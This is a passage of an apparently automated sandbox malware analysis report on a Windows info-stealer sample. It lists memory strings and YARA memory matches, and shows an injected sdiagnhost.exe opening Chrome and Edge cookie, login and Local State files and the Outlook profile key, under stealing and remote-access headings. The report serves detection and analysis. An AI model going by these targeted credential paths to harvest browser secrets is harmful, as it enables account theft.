Source: gBSE2iEQW.exe, 00000007.00000000.1601979012.0000000001531000.00000002.00000001.00040000.00000000.sdmp, gBSE2iEQW.exe, 00000007.00000002.2481960195.0000000001530000.00000002.00000001.00040000.00000000.sdmp, gBSE2iEQW.exe, 00000009.00000000.1762471202.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: XProgram Manager
Source: gBSE2iEQW.exe, 00000007.00000000.1601979012.0000000001531000.00000002.00000001.00040000.00000000.sdmp, gBSE2iEQW.exe, 00000007.00000002.2481960195.0000000001530000.00000002.00000001.00040000.00000000.sdmp, gBSE2iEQW.exe, 00000009.00000000.1762471202.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: gBSE2iEQW.exe, 00000007.00000000.1601979012.0000000001531000.00000002.00000001.00040000.00000000.sdmp, gBSE2iEQW.exe, 00000007.00000002.2481960195.0000000001530000.00000002.00000001.00040000.00000000.sdmp, gBSE2iEQW.exe, 00000009.00000000.1762471202.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: gBSE2iEQW.exe, 00000007.00000000.1601979012.0000000001531000.00000002.00000001.00040000.00000000.sdmp, gBSE2iEQW.exe, 00000007.00000002.2481960195.0000000001530000.00000002.00000001.00040000.00000000.sdmp, gBSE2iEQW.exe, 00000009.00000000.1762471202.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock

Stealing of Sensitive Information

Source: Yara match File source: 0.2.INQUIRY 02825 AISISAE 9310.exe.50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.2480301327.0000000002B90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1694455454.0000000000051000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1699741449.00000000068F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2481831657.0000000003160000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2482100225.0000000004A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2482791837.00000000036D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1695148193.0000000002750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\sdiagnhost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\sdiagnhost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\sdiagnhost.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\sdiagnhost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\sdiagnhost.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\sdiagnhost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\sdiagnhost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\sdiagnhost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\sdiagnhost.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality

Source: Yara match File source: 0.2.INQUIRY 02825 AISISAE 9310.exe.50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.2480301327.0000000002B90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1694455454.0000000000051000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1699741449.00000000068F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2481831657.0000000003160000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2482100225.0000000004A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2482791837.00000000036D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1695148193.0000000002750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY